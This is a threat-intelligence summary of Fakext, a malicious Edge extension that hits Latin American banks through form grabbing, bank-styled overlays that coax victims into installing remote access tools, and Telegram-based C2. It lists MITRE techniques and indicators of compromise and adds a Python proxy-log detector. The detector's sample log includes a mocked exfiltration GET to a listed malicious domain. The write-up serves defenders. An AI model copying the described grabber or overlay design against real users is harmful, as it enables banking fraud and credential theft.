Keypoints
- Infection vector: a malicious Microsoft Edge extension (SATiD) designed to persistently inject scripts into pages.
- Loader and C2: the extension fetches a loader from multiple C2 servers and uses Telegram’s API as an additional command-and-control channel.
- Fingerprinting: Fakext downloads FingerprintJS to generate a “fkr-client-uid” document attribute used to identify victims and gate payloads.
- Payload modules: two primary modules — a generic form grabber that logs input fields and an overlay injector that simulates bank support to coerce RAT installation.
- Evasion: network traffic is masked through domains crafted to resemble legitimate CDNs/frameworks and the code uses obfuscation, native overrides and anti-debugging to hinder analysis.
- Data theft and fraud flow: captured form data and overlay state are exfiltrated (example GET requests), RAT credentials are collected via overlays, and the attacker can perform transactions using the stolen session/context.
MITRE Techniques
- [T1547] Persistence – The extension provides a persistent mechanism to inject scripts into the victim’s HTML page. [‘The sole purpose of the extension is to provide a persistent mechanism to inject scripts into the victim’s HTML page.’]
- [T1071] Application Layer Protocol – Fakext uses HTTP and Telegram API calls for command-and-control and to send screenshots/state to C2. [‘Fakext uses Telegram’s application programming interface (API) as another communication channel with the C2 servers. The current state of the injection and even screenshots are sent using Telegram.’]
- [T1056] Input Capture – The malware hooks into input fields and exfiltrates full input elements on keypress. [‘a form grabber that logs all input fields on the page’ and ‘Once a keypress occurs, the entire input element… is sent to the C2 server.’]
- [T1041] Exfiltration Over C2 Channel – Captured inputs and overlay state are sent to C2 via HTTP GET requests. [‘Figure 2: Example GET request with exfiltrated data’]
- [T1204] User Execution (Social Engineering) – Overlays impersonate bank IT support to coerce users into downloading and installing a RAT. [‘the popup prompts the user to download a legitimate remote access tool (RAT) and provides the fraudster with the tool’s credentials.’]
- [T1078] Valid Accounts – Collected RAT credentials and session/context are used by fraudsters to perform transactions and other financial fraud. [‘With RAT credentials, knowledge of the user, banking app state and the ability to inject certain pages… the fraudster can perform transactions and other types of financial fraud.’]
Indicators of Compromise
- [Domains] C2 and evasion domains – fastify.elfaker.workers.dev, jschecks.com, and other similar domains used to host loader/payloads (and 6 more domains).
- [HTML attribute] Document fingerprinting marker – fkr-client-uid (attribute of the top-level document element) used to identify infected browsers.
- [Malicious extension] Edge store add-on URL – https://microsoftedge.microsoft.com/addons/detail/satid/odpnfiaoaffclahakgdnneofodejhaop (SATiD extension page).
- [File hashes] Extension component hashes – contents.16a81c08.js (043bac1634491871ece146331382aaec), oot.72e07fb5.js (1ef985af2759d1212c2434429b627f30), and 10 more hashes.
Fakext is deployed as a persistent Edge browser extension that loads a remote “loader” script into the page context and uses that loader to gate and fetch additional modules based on the current URL and a fingerprint-derived ID. The extension pulls FingerprintJS from a legitimate CDN to compute a browser fingerprint and writes it as the top-level document attribute fkr-client-uid; the loader checks that ID and the page URL against a hardcoded list of target banks before downloading targeted modules from C2 infrastructure. Command-and-control traffic uses ordinary HTTP(S) endpoints and the Telegram API (the extension sends injection state and screenshots to Telegram), while domains mimicking CDNs are used to blend malicious requests with benign traffic.
Once active on a targeted site, Fakext runs two primary modules: a form grabber and an overlay injector. The form grabber hooks into input events and transmits the entire input element (style, id, type, value) and the page URL back to C2 via GET requests, enabling precise credential and context theft. For higher-value targets, the overlay module injects UI that matches the bank’s styling, blocks normal page interaction, and simulates “IT support” prompts instructing victims to install legitimate remote access tools (e.g., TeamViewer); the overlay continuously reports its state (which popup page, pre/post-login status, RAT installed) to the attacker, who can then use RAT credentials plus session/context to carry out fraudulent transactions and OTP interception. The extension uses code obfuscation, native function overrides and anti-debugging tricks to defeat analysis, and because the extension overrides browser behavior, native protections like CSP, SSL or CORS do not prevent these injections.
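As an added defensive example (not code from the original article), the Python check below scans constructed proxy-log lines for the three network behaviours described above: requests to the listed IoC domains, GET-based form-grabber exfiltration carrying the input element fields plus the page URL, and Telegram Bot API calls used as a C2 channel. The log line format, URL paths and query-parameter names are assumptions made for the sample.

```python
"""Proxy-log detection for the Fakext network behaviours summarised above.
Assumptions (not from the article): the 'client method url' log format,
the exfil query-parameter names, and that browser-originated Telegram Bot
API calls are anomalous in the monitored environment."""
import re
from urllib.parse import urlsplit, parse_qs

# Domains taken from the Indicators of Compromise section.
IOC_DOMAINS = {"fastify.elfaker.workers.dev", "jschecks.com"}
# The form grabber is described as sending the whole input element
# (style, id, type, value) and the page URL; parameter names are assumed.
EXFIL_FIELDS = {"style", "id", "type", "value"}
# Telegram Bot API paths have the shape /bot<id>:<token>/<method>.
TELEGRAM_BOT_RE = re.compile(r"^/bot\d+:[A-Za-z0-9_-]+/")


def classify(url: str) -> list[str]:
    """Return the detection labels that apply to one requested URL."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    hits = []
    if host in IOC_DOMAINS:
        hits.append("ioc-domain")
    if host == "api.telegram.org" and TELEGRAM_BOT_RE.match(parts.path):
        hits.append("telegram-bot-c2")
    params = parse_qs(parts.query)
    # A GET whose query carries every input-element field plus the page
    # URL matches the form-grabber exfiltration shape.
    if EXFIL_FIELDS.issubset(params) and "url" in params:
        hits.append("form-grabber-exfil")
    return hits


def scan_log(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Parse 'client method url' lines; return (url, labels) for flagged ones."""
    flagged = []
    for line in lines:
        try:
            _client, _method, url = line.split(maxsplit=2)
        except ValueError:
            continue  # malformed line, skip it
        labels = classify(url.strip())
        if labels:
            flagged.append((url.strip(), labels))
    return flagged


# Constructed sample log: one benign request, a loader fetch from an IoC
# domain, a form-grabber style exfil GET, and a Telegram Bot API call.
SAMPLE_LOG = [
    "10.0.0.5 GET https://www.example-bank.test/login",
    "10.0.0.5 GET https://jschecks.com/loader.js",
    "10.0.0.5 GET https://jschecks.com/c?style=color%3Ared&id=user&type=text"
    "&value=jdoe&url=https%3A%2F%2Fwww.example-bank.test%2Flogin",
    "10.0.0.5 POST https://api.telegram.org/bot123456:ABCdef_ghi/sendMessage",
]

if __name__ == "__main__":
    for url, labels in scan_log(SAMPLE_LOG):
        print(", ".join(labels), "->", url)
```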
Read more: https://securityintelligence.com/posts/fakext-targeting-latin-american-banks/